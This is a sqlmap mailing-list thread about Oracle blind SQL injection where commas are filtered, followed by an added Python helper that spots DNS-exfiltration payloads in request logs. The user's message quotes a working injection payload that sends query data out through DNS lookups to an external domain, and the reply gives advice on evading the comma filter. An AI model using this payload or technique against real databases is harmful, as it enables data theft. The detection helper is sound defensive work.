Hi.

Well, both blind injection and DNS exfiltration require usage of the comma
character, because there is a need for extracting bits/characters/chunks
(SUBSTRC).

Nonetheless, the method you referenced would require a noticeable amount of
work to be done on the Oracle side. I would suggest that you try a manual DNS
exfiltration approach without SUBSTRC (whole query response into the DNS
request, and pray that it fits within the size limits).

Kind regards,
Miroslav Stampar


On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fodor.em...@gmail.com> wrote:

> Heya,
>
> Sqlmap identifies an Oracle blind injection point, but commas are filtered
> so I get no data even when using --dns-domain.
>
> Even with --dns-domain there are substrings (,) in query
> ---
> AND ASCII(SUBSTRC((SELECT
> UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
> RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
> DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
> FROM DUAL),8,1))>914 AND (7100=7100)
> ---
>
> Is there a way to do the technique described on this page with sqlmap?
>
> http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
>
> M
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users


-- 
Miroslav Stampar
http://about.me/stamparm
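
Added example, not part of the original thread and not sqlmap code: a log-triage helper that finds a `UTL_INADDR.GET_HOST_ADDRESS` call in a URL-decoded request value, decodes its `CHR()` chain, and returns the constant hostname tail to look for in DNS resolver logs. The function names are hypothetical, and the input is the condition quoted in the message above.

```python
import re

RESOLVER_RE = re.compile(r"UTL_INADDR\.GET_HOST_ADDRESS\(", re.I)
CHR_RE = re.compile(r"CHR\((\d+)\)", re.I)
# Constructed log value: the condition quoted in the thread. Helper names are ours.
LOGGED = (
    "AND ASCII(SUBSTRC((SELECT UTL_INADDR.GET_HOST_ADDRESS("
    "CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT RAWTOHEX(SUBSTRC((NVL("
    "CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM DUAL)||CHR(46)||"
    "CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||"
    "CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||"
    "CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||"
    "CHR(122)) FROM DUAL),8,1))>914 AND (7100=7100)"
)

def resolver_argument(text):
    """Balanced-parenthesis argument of the first resolver call, else None."""
    m = RESOLVER_RE.search(text)
    if not m:
        return None
    depth = 1
    for i in range(m.end(), len(text)):
        depth += (text[i] == "(") - (text[i] == ")")
        if depth == 0:
            return text[m.end():i]
    return None  # log line was truncated before the call closed

def top_level_parts(expr):
    """Split on the || concatenation operator outside any parentheses."""
    parts, depth, last = [], 0, 0
    for i in range(len(expr)):
        depth += (expr[i] == "(") - (expr[i] == ")")
        if depth == 0 and expr.startswith("||", i):
            parts.append(expr[last:i].strip())
            last = i + 2
    return parts + [expr[last:].strip()]

def hostname_template(text):
    """Decode CHR() literals; anything else is the exfiltrated <DATA> label."""
    arg = resolver_argument(text)
    if arg is None:
        return None
    decoded = map(CHR_RE.fullmatch, top_level_parts(arg))
    return "".join(chr(int(m.group(1))) if m else "<DATA>" for m in decoded)

def fixed_suffix(text):
    """Constant tail of the hostname: the string to search for in DNS logs."""
    tpl = hostname_template(text)
    return tpl.rsplit("<DATA>", 1)[-1].lstrip(".") if tpl else None
```

Resolver queries ending in the returned suffix, with a long hex label in front of it, indicate that the database host actually performed the lookup.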